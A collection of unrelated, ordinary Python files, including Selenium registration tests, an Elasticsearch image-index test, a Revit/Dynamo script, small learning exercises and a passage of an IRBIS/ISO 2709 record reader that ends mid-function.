class TestSearch(aiounittest.AsyncTestCase):
def get_event_loop(self):
self.loop = asyncio.get_event_loop()
return self.loop
@classmethod
def setUpClass(cls):
# ===============================================================
# UT测试开始,清空数据环境
try:
cls.loop = asyncio.get_event_loop()
params = dict(
labels=[SetAddLabel(i) for i in range(3)],
)
cls.loop.run_until_complete(MatchImageIndexDelete(params))
time.sleep(10)
except BaseException as err:
print(err)
raise(err)
@classmethod
def tearDownClass(cls):
# ===============================================================
# UT测试完成,删除测试数据
try:
cls.loop = asyncio.get_event_loop()
params = dict(
labels=[SetAddLabel(i) for i in range(3)],
)
cls.loop.run_until_complete(MatchImageIndexDelete(params))
time.sleep(3)
except BaseException as err:
print(err)
raise(err)
async def test_AddImageLabel_1(self):
# ===============================================================
# 为一张图片首次创建索引
image = SetAddImage()
label = SetAddLabel(1)
result = await CheckAddImageLabelResult(image, label)
self.assertTrue(result)
# ===============================================================
# 为一张图片追加标签更新索引
image = SetAddImage()
label = SetAddLabel(2)
result = await CheckAddImageLabelResult(image, label)
self.assertTrue(result)
async def test_AddImageLabel_2(self):
# ===============================================================
# 创建图片标签索引时ES连接错误
image = SetAddImage()
label = SetAddLabel()
elasticsearch_path = mock.Mock(return_value="http://127.0.0.1:8080")
with mock.patch('match_image.create_index.ELASTICSEARCH_PATH', elasticsearch_path):
result = await CatchESConnectError(image, label)
self.assertTrue(result)
async def test_AddImageLabel_3(self):
# ===============================================================
# 创建图片标签索引时dl连接错误
image = SetAddImage()
label = SetAddLabel()
dl_inference_server_excep = mock.Mock(return_value=Exception)
with mock.patch('match_image.create_index.GetVisualLabels', dl_inference_server_excep):
ahash_result = mock.Mock(return_value="error_hash_code")
with mock.patch('match_image.create_index.AverageHash', ahash_result):
result = await CatchDLConnectError(image, label)
self.assertTrue(result)
async def test_AddImageLabel_4(self):
# ===============================================================
# 创建图片标签索引时ES连接正常,但未初始化
image = SetAddImage()
label = SetAddLabel()
aliases = mock.Mock(return_value="error_aliases")
with mock.patch('match_image.create_index.ALIASES', aliases):
result = await CatchESInitError(image, label)
self.assertTrue(result)
if __name__ == "__main__":
unittest.main() |
import clr
clr.AddReference('ProtoGeometry')
from Autodesk.DesignScript.Geometry import *
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
clr.AddReference("RevitAPI")
import Autodesk
from Autodesk.Revit.DB import *
#Override graphics
def OverrideElement(element, color, fill, fillpatt):
ogs = OverrideGraphicSettings()
ogs.SetProjectionLinePatternId(fill.Id)
ogs.SetProjectionFillColor(color)
ogs.SetProjectionFillPatternId(fillpatt.Id)
doc.ActiveView.SetElementOverrides(element.Id, ogs)
#Convert the Dynamo color to Revit color.
def ConvertColor(element):
colorList = list()
for e in element:
color = Autodesk.Revit.DB.Color(e.Red, e.Green, e.Blue)
colorList.append(color)
return colorList
doc = DocumentManager.Instance.CurrentDBDocument
#Collect all the line patterns in the project.
patterns = FilteredElementCollector(doc).OfClass(LinePatternElement).ToElements()
fillPatSelected = list()
#search for line pattern
for i in range(len(patterns)):
namepick = patterns[i].ToDSType(True)
if namepick.Name == "Dash":
fillPatSelected.append(patterns[i])
elements = UnwrapElement(IN[0]) #Element to change
colors = ConvertColor(IN[1]) #Color.ByARGB node from Dynamo
fillPat = UnwrapElement(IN[2]) #Fill Pattern node from Dynamo
count = 0 #count to change color if elements are differnt color.
for i in elements:
TransactionManager.Instance.EnsureInTransaction(doc)
#Using def to override graphics.
OverrideElement(i, colors[count], fillPatSelected[0], fillPat)
count += 1
TransactionManager.Instance.TransactionTaskDone()
|
import sys
# 명령 매개 변수를 출력
print(sys.argv)
print("ㅡㅡㅡ")
# 컴퓨터 환경과 관련된 정보를 출력
print("get windows version :()", sys.getwindowsversion())
print("ㅡㅡㅡ")
print("copyright :", sys.copyright)
print("ㅡㅡㅡ")
print("version :", sys.version)
# 프로그램을 강제로 종료
sys.exit() |
import numpy as np
import cv2, os, math
class ColorSystem:
@staticmethod
def grayscale(img):
newImage = np.zeros((img.shape[0],img.shape[1],img.shape[2]), np.uint8)
rows, columns, pixel = img.shape
for i in range(rows):
for j in range(columns):
red = img[i][j][0]
green = img[i][j][1]
blue = img[i][j][2]
newPixel = round((red + green + blue) / 3)
newImage[i][j] = newPixel
return newImage
@staticmethod
def cmy(img):
newImage = np.zeros((img.shape[0],img.shape[1],img.shape[2]), np.uint8)
rows, columns, pixel = img.shape
for i in range(rows):
for j in range(columns):
C = 255 - img[i][j][0]
M = 255 - img[i][j][1]
Y = 255 - img[i][j][2]
newImage[i][j][0] = C
newImage[i][j][1] = M
newImage[i][j][2] = Y
return newImage
@staticmethod
def YCrCb(img):
newImage = np.zeros((img.shape[0],img.shape[1],img.shape[2]), np.uint8)
rows, columns, pixel = img.shape
delta = 128
#delta = 32768
#delta = 0.5
for i in range(rows):
for j in range(columns):
R = img[i][j][0]
G = img[i][j][1]
B = img[i][j][2]
Y= 0.229*R + 0.587*G + 0.144*B
Cr = (R - Y) * 0.713 + delta
Cb = (B - Y) * 0.564 + delta
newImage[i][j][0] = Y
newImage[i][j][1] = Cr
newImage[i][j][2] = Cb
return newImage
|
import pytest
from seleniumbase import BaseCase
from qa327_test.conftest import base_url
from unittest.mock import patch
from qa327.models import db, User
from werkzeug.security import generate_password_hash, check_password_hash
# Mock a sample user
test_user = User(
email='test_frontend@test.com',
name='test_frontend',
password=generate_password_hash('Password!'),
balance=0
)
# Sample user with an unhashed password
test_user_unhashed = User(
email='test_frontend@test.com',
name='test_frontend',
password='Password!',
)
# Mock a newly registered sample user
test_valid = User(
email='valid.email@address.com',
name='Valid Username',
password=generate_password_hash('ValidP@ssword'),
balance=5000
)
# Newly registered sample user with an unhashed password
test_valid_unhashed = User(
email='valid.email@address.com',
name='Valid Username',
password='ValidP@ssword',
)
class RegisterTest(BaseCase):
@patch('qa327.backend.get_user', return_value=test_user)
def test_R2_1(self, *_):
"""
If the user has logged in, redirect back to the user profile page
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Enter `test_user_unhashed.email` in `#email` element
self.type("#email", test_user_unhashed.email)
# Enter `test_user_unhashed.password` in `#password` element
self.type("#password", test_user_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Navigate to /register
self.open(base_url + '/register')
# Verify that profile page is visible by checking for `#welcome-header` element in DOM
self.assert_element("#welcome-header")
self.assert_text("Hi test_frontend", "#welcome-header")
def test_R2_2(self, *_):
"""
Otherwise, show the user registration page
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Verify that register page is visible by checking for expected elements (eg. `form-group`) in DOM
self.assert_title("Register")
def test_R2_3(self, *_):
"""
The registration page shows a registration form requesting:
email, user name, password, password2
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Verify that `#email`, `#name`, `#password`, and `#password2` elements exist in the DOM
self.assert_element("#email")
self.assert_element("#name")
self.assert_element("#password")
self.assert_element("#password2")
@patch('qa327.backend.register_user', return_value=None)
def test_R2_4(self, *_):
"""
The registration form can be submitted as a POST request to the current URL (/register)
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify that login page is visible by checking expected elements (eg. `form-group`) in DOM
self.assert_title("Log In")
def test_R2_5a(self, *_):
"""
Email cannot be empty
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_5b(self, *_):
"""
Password cannot be empty
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_5c(self, *_):
"""
Password2 cannot be empty
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("The passwords do not match", "#message")
def test_R2_5d(self, *_):
"""
Email has to follow addr-spec defined in RFC 5322
(see https://en.wikipedia.org/wiki/Email_address for a human-friendly explanation)
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter “not.@.valid@email_address.com” in `#email` element
self.type("#email", "not.@.valid@email_address.com")
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_5e(self, *_):
"""
Password has to meet the required complexity: minimum length 6
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter “$Mall” in `#password` element
self.type("#password", "$Mall")
# Enter “$Mall” in `#password2` element
self.type("#password2", "$Mall")
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_5f(self, *_):
"""
Password has to meet the required complexity: at least one upper case
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter “lowerc@se” in `#password` element
self.type("#password", "lowerc@se")
# Enter “lowerc@se” in `#password2` element
self.type("#password2", "lowerc@se")
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_5g(self, *_):
"""
Password has to meet the required complexity: least one lower case
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter “UPPERC@SE” in `#password` element
self.type("#password", "UPPERC@SE")
# Enter “UPPERC@SE” in `#password2` element
self.type("#password2", "UPPERC@SE")
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_5h(self, *_):
"""
Password has to meet the required complexity: at least one special character
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter “noSpecial” in `#password` element
self.type("#password", "noSpecial")
# Enter “noSpecial” in `#password2` element
self.type("#password2", "noSpecial")
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Email/Password combination incorrect", "#message")
def test_R2_6(self, *_):
"""
Password and password2 have to be exactly the same
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a different valid password (e.g. “AlsoValidP@ssword”) in `#password2` element
self.type("#password2", "AlsoValidP@ssword")
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("The passwords do not match", "#message")
def test_R2_7a(self, *_):
"""
Username has to be non-empty.
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Username format error", "#message")
def test_R2_7b(self, *_):
"""
Username has to be alphanumeric-only.
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter “#alphanumer” in `#name` element
self.type("#name", "#alphanumer")
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Username format error", "#message")
def test_R2_8a(self, *_):
"""
Username has to be longer than 2 characters.
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter “2C” in `#name` element
self.type("#name", "2C")
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Username format error", "#message")
def test_R2_8b(self, *_):
"""
Username has to be less than 20 characters.
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter “twentycharacterslong” `#name` element
self.type("#name", "twentycharacterslong")
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("Username format error", "#message")
@patch('qa327.backend.register_user', return_value="This email has been ALREADY used")
def test_R2_10(self, *_):
"""
If the email already exists, show message 'This email has been ALREADY used'
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays error message by checking content of `#message`
self.assert_element("#message")
self.assert_text("This email has been ALREADY used", "#message")
@patch('qa327.backend.get_user', return_value=test_valid)
@patch('qa327.backend.register_user', return_value=None)
def test_R2_11(self, *_):
"""
If no error regarding the inputs following the rules above,
create a new user, set the balance to 5000, and go back to the /login page
"""
# Navigate to /logout (Invalidate any logged-in sessions)
self.open(base_url + '/logout')
# Navigate to /login
self.open(base_url + '/login')
# Navigate to /register
self.open(base_url + '/register')
# Enter a valid username (e.g. “Valid Username”) in `#name` element
self.type("#name", test_valid_unhashed.name)
# Enter a valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Enter a valid password (e.g. “ValidP@ssword”) in `#password2` element
self.type("#password2", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Enter the same valid email address (e.g. “valid.email@address.com”) in `#email` element
self.type("#email", test_valid_unhashed.email)
# Enter the same valid password (e.g. “ValidP@ssword”) in `#password` element
self.type("#password", test_valid_unhashed.password)
# Click on `#btn-submit` element
self.click('input[type="submit"]')
# Verify current page displays balance at 5000 by checking content of `#balance_message`
self.assert_element("#balance")
self.assert_text("User Balance: $5000", "#balance") |
import logging
import asyncio
logging.basicConfig(filename = "test3_log.txt", filemode = 'w', format='%(asctime)s: %(message)s', datefmt='%d-%b-%y %H:%M:%S', level=20)
async def nested(value):
await asyncio.sleep(value)
logging.info("Logging Message.")
async def main ():
taskList = []
for i in range(4):
taskList.append(asyncio.create_task(nested(i)))
for j in taskList:
await j
asyncio.run(main()) |
#!/usr/bin/python
import random
file = open('ejRandom.in', 'w+')
for x in xrange(1,10000, 100):
i = 0
while i < x:
file.write(str(random.randrange(-x,x)) + ' ')
i = i + 1
file.write('\n')
file.close()
file2 = open('ejPeorCaso.in', 'w+')
for x in xrange(1,10000, 100):
i = 0
if random.randrange(0,2) == 0:
num = random.randrange(-x,0)
while i < x:
num = num + (random.randrange(x)+1)
file2.write(str(num) + ' ')
i = i + 1
else:
num = random.randrange(0,x)
while i < x:
num = num - (random.randrange(x)+1)
file2.write(str(num) + ' ')
i = i + 1
file2.write('\n')
file2.close()
file3 = open('ejMejorCaso.in', 'w+')
for x in xrange(1,10000, 100):
i = 0
signo = 0
num = 0
aux = 0
aux2 = 0
while i < x:
if signo == 0:
num = aux + (random.randrange(x)+1)
aux = num
signo = 1
else:
num = aux2 - (random.randrange(x)+1)
aux2 = num
signo = 0
file3.write(str(num) + ' ')
i = i + 1
file3.write('\n')
file3.close() |
import random
import csv
def get_table_from_file(file_name):
with open(file_name, "r") as file:
lines = file.readlines()
table = [element.replace("\n", "").split("!") for element in lines]
return table
def csv_reader(file_name):
reader = csv.reader(open(file_name, 'r'))
data = sum([i for i in reader], [])
return random.choice(data)
|
'''
Write a Python function to check whether a number is in a given range.
'''
def check_range(num):
if int(num) in range(0,11):
print ("%s is in range from 0 to 10" % num)
else:
print ("%s is outside of the range from 0 to 10" % num)
check_range(input("Enter the number: ")) |
import random
print('가위바위보 게임입니다')
l = ['가위','바위','보']
def gawi():
print(' * *')
print(' * *')
print(' * *')
print(' * *')
print(' ***')
print(' ******')
print(' ********')
print(' *****')
print(' ***')
def bawi():
print('')
print('')
print('')
print('')
print(' ***')
print(' ******')
print(' ********')
print(' *****')
print(' ***')
def bo():
print(' * * ')
print(' * * *')
print(' * * * *')
print(' * * * *')
print('* * * * *')
print('** ******')
print(' ********')
print(' *****')
print(' ***')
def display(x):
if x == 1:
gawi()
if x == 2:
bawi()
if x == 3:
bo()
while True:
a = random.randint(1, 3)
print('')
print('1=가위 2=바위 3=보')
print('무엇을 내실건가요?')
c = input('')
try:
d = int(c)
except:
print('숫자(가위 바위 보)로 입력해주세요.')
continue
if d == 0:
print('게임이 끝납니다')
break
if 3 < d or d < 1:
print('잘못 입력하셧습니다.')
continue
print ('제가 낸 것')
display(a)
print('당신이 낸 것 ')
display(d)
if a == d:
print('비겻다')
if (a == 1 and d == 2) or (a == 2 and d == 3) or (a == 3 and d == 1 ):
print('당신이 이겻습니다')
if (a == 2 and d == 1) or (a == 3 and d == 2) or (a == 1 and d == 3):
print('제가 이겻습니다')
|
import os
import torch
import torchvision
from torch import nn
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.utils import save_image
from torch.utils.data import TensorDataset
import numpy as np
from model import autoencoder
from pprint import pprint
from helpers import load, neighbors
(words, vectors) = load()
model = autoencoder()
model.load_state_dict(torch.load('./model.pth'))
compressed = []
for vec in vectors:
X = Variable(vec)
output = model.encoder(X)
compressed.append(output.data.numpy())
neighbors(words, compressed) |
pi = 3.14
alphabet = []
for letter in range(97,123):
alphabet.append(chr(letter))
data = input("Metin: ").lower().replace(" ", "")
words=[]
for word in range(len(data)):
words.append(data[word])
message = []
for i in words:
for j in alphabet:
if(i == j):
msg = alphabet.index(i) + 1
message.append(msg)
enc_msg = (''.join(map(str, message)))
com_msg = int(enc_msg) * pi
print(" encode ")
print(com_msg)
print(" decode ")
print(com_msg / pi)
|
class Node:
def __init__(self, value):
self.value = value
self.next = None
class Queue:
def __init__(self):
self.front = None
self.rear = None
def enqueue(self, value):
node = Node(value)
if not self.rear:
self.front = node
self.rear = node
else:
self.rear.next = node
self.rear = node
def dequeue(self):
try:
temp = self.front
self.front = self.front.next
temp.next = None
return temp
except:
return 'this is an empty Stack'
def peek(self):
try:
return self.front.value
except:
return 'this is an empty Stack'
def is_empty(self):
return self.front == None
# **************************************************************************************************
class Animal:
def __init__(self,name,kind):
self.name = name
self.kind = kind
self.next = None
class AnimalShelter():
def __init__(self):
self.front = None
self.rear = None
def Animal_enqueue(self, name,kind):
animal = Animal(name,kind)
if (animal.kind == 'dog' or animal.kind == 'cat'):
if not self.rear:
self.rear = animal
self.front = animal
else:
self.rear.next = animal
self.rear = animal
return 'Successfully added the animal'
else:
return 'your input should only be a cat or a dog'
# this algorithm is built with a hint from google, not entirely by myself, which is the idea of previous (i needed to create a
# previous by myself, but previous isn't available in Queues, so, the temp.next worked)
def Animal_dequeue(self , pref):
if not self.rear:
return None
if (pref != 'dog' and pref != 'cat'):
return None
else:
temp = self.front
if self.front.kind == pref:
self.front = self.front.next
temp.next = None
if not self.front:
self.rear = None
return temp.name
else:
while temp.next:
if temp.next.kind == pref:
to_return = temp.next.name
temp.next = temp.next.next
return to_return
else:
temp = temp.next
return None
if __name__ == "__main__":
animals = AnimalShelter()
animals.Animal_enqueue('sugar','cat')
animals.Animal_enqueue('shawerma','dog')
animals.Animal_enqueue('caramel','cat')
animals.Animal_enqueue('banana','dog')
print(animals.Animal_dequeue("cat"))
print(animals.Animal_dequeue("dog"))
print(animals.Animal_dequeue("dog"))
print(animals.Animal_dequeue("cat"))
print(animals.front)
print(animals.rear)
print(animals.Animal_dequeue("dog"))
print(5555555555555555555)
animals.Animal_enqueue('argon','dog')
animals.Animal_enqueue('biter','cat')
print(animals.Animal_dequeue("cat"))
print(animals.Animal_dequeue("dog"))
print(animals.Animal_dequeue("cat"))
print(animals.Animal_dequeue("dog")) |
import re
from collections import defaultdict
REGEX_TRUTH_FILE_ENTRY = r"(?P<tax_id>\d+)\t(?P<abs_abundance>\d+(?:\.\d*)?)\t(?P<rel_abundance>0\.\d+)?\t(?P<rank>[a-zA-Z]+)\t(?P<tax_name>.+)(?:\n|$)"
def parse_truth_file(truth_file):
"""Parses a TSV truth file with the following format.
Arguments:
filename {str} -- Path of the filename to parse
"""
# Note: we ignore the relative abundances because it might have rounding errors
# (e.g. there were entries like 0.000000)
for line in truth_file:
matches = re.match(REGEX_TRUTH_FILE_ENTRY, line)
yield {
'tax_id': int(matches.group('tax_id')),
'rank': matches.group('rank'),
'abs_abundance': int(float(matches.group('abs_abundance'))),
'tax_name': matches.group('tax_name')
}
def extract_truth(truth_files):
truth_taxa = defaultdict(lambda: [])
for truth_file in truth_files:
for entry in parse_truth_file(truth_file):
truth_taxa[entry['rank']].append(entry)
return truth_taxa
|
# coding: utf-8
"""
Reading and writing plain text files in IRBIS format.
"""
# pylint: disable=too-many-locals
# pylint: disable=too-many-statements
from typing import TYPE_CHECKING
from irbis._common import ANSI, STOP_MARKER, safe_str
from irbis.error import IrbisError
from irbis.records import SubField, Field, Record
if TYPE_CHECKING:
from typing import Iterable, Optional, List
def read_text_record(stream) -> 'Optional[Record]':
"""
Чтение записи из файла в текстовом обменном формате ИРБИС.
:param stream: Файл
:return: Запись или None
"""
result = Record()
while True:
line: str = stream.readline()
if not line:
break
line = line.strip()
if line.startswith(STOP_MARKER):
break
if not line.startswith('#'):
break
parts = line[1:].split(':', 1)
if len(parts) != 2:
break
tag = int(parts[0])
text = parts[1][1:]
field = Field(tag)
field.parse(text)
result.fields.append(field)
if not result.fields: # Если в записи нет полей, возвращаем None
return None
return result
def write_text_record(stream, record: Record) -> None:
"""
Сохранение записи в файл в текстовом обменном формате ИРБИС.
:param stream: Текстовый поток, в который разрешена запись.
:param record: Библиографическая запись.
:return: None
"""
assert stream
assert record
for field in record.fields:
parts = ['#' + str(field.tag) + ': ' + safe_str(field.value)]
for subfield in field.subfields:
parts.extend(str(subfield))
line = ''.join(parts) + '\n'
stream.write(line)
stream.write(STOP_MARKER + '\n')
###############################################################################
# Length of the record marker
MARKER_LENGTH = 24
# Record delimiter
RECORD_DELIMITER = 0x1D
# Field delimiter
FIELD_DELIMITER = 0x1E
# Subfield delimiter
SUBFIELD_DELIMITER = 0x1F
def parse_int(buffer: 'Iterable'):
"""
Parse the bytes for integer value.
:param buffer: Buffer to parse
:return: Integer value
"""
result = 0
for byte in buffer:
result = result * 10 + byte - 48
return result
def encode_int(buffer: bytearray, position: int,
length: int, value: int) -> None:
"""
Encode the integer value.
:param buffer: Buffer to fill
:param position: Start position
:param length: Chunk length
:param value: Value to encode
:return: None
"""
length -= 1
position += length
while length >= 0:
buffer[position] = value % 10 + ord('0')
value //= 10
position -= 1
length -= 1
def encode_str(buffer: bytearray, position: int,
value: 'Optional[str]', encoding: str) -> int:
"""
Encode the string value.
:param buffer: Buffer to fill
:param position: Start position
:param value: Value to encode (can be None or empty string)
:param encoding: Encoding to use
:return: Updated position
"""
if value:
encoded = value.encode(encoding)
for byte in encoded:
buffer[position] = byte
position += 1
return position
def read_iso_record(stream, charset: str = ANSI) -> 'Optional[Record]':
"""
Чтение записи из файла в формате ISO 2709.
:param stream: Файл или файлоподобный объект
:param charset: Кодировка
:return: Декодированная запись либо None
"""
# Считываем длину записи
marker = stream.read(5)
if len(marker) != 5:
return None
# а затем и ее остаток
record_length = parse_int(marker)
need = record_length - 5
tail = stream.read(need)
if len(tail) != need:
return None
# Простая проверка, что мы имеем дело с нормальной ISO-записью
record = marker + tail
if record[record_length - 1] != RECORD_DELIMITER:
return None
# Превращаем запись в Unicode
indicator_length = parse_int(record[10:11])
base_address = parse_int(record[12:17])
# Начинаем собственно конверсию
result = Record()
# Пошли по полям при помощи справочника
directory = MARKER_LENGTH
